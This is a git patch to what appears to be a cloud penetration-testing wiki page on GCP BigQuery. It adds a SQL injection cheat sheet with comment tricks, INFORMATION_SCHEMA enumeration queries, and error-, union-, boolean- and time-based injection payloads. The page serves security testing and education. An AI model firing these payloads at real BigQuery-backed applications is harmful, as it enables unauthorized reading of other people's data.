From 7f7bb18824bec281a42f081e62ec3dc8c2962363 Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 28 Feb 2024 21:51:54 +0000 Subject: [PATCH] GITBOOK-587: change request with no subject merged in GitBook --- .../gcp-services/gcp-bigquery-enum.md | 56 ++++++++++++++++++- 1 file changed, 55 insertions(+), 1 deletion(-) diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md index 9b30bccf9..16dff6b27 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md +++ b/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md @@ -170,7 +170,61 @@ bq show --encryption_service_account # Get encryption service account ### BigQuery SQL Injection -[https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) +For further information you can check the blog post: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac). Here just some details are going to be given. + +**Comments**: + +* `select 1#from here it is not working` +* `select 1/*between those it is not working*/` But just the initial one won't work +* `select 1--from here it is not working` + +Get **information** about the **environment** such as: + +* Current user: `select session_user()` +* Project id: `select @@project_id` + +Get **datasets**, **tables** and **column** names: + +* **Project** and **dataset** name: + +{% code overflow="wrap" %} +```sql +SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA +``` +{% endcode %} + +* **Column** and **table** names: + +{% code overflow="wrap" %} +```sql +# SELECT table_name, column_name FROM ..INFORMATION_SCHEMA.COLUMNS + +SELECT table_name, column_name FROM digital-bonfire-410512.importeddataset.INFORMATION_SCHEMA.COLUMNS +``` +{% endcode %} + +* **Other datasets** in the same project: + +{% code overflow="wrap" %} +```sql +# SELECT catalog_name, schema_name, FROM .INFORMATION_SCHEMA.SCHEMATA + +SELECT catalog_name, schema_name, NULL FROM digital-bonfire-410512.INFORMATION_SCHEMA.SCHEMATA +``` +{% endcode %} + +**SQL Injection types:** + +* Error based - casting: `select CAST(@@project_id AS INT64)` +* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` +* Union based: `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#` +* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#`` +* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000`` + +**Documentation:** + +* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators) +* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting) ### Privilege Escalation & Post Exploitation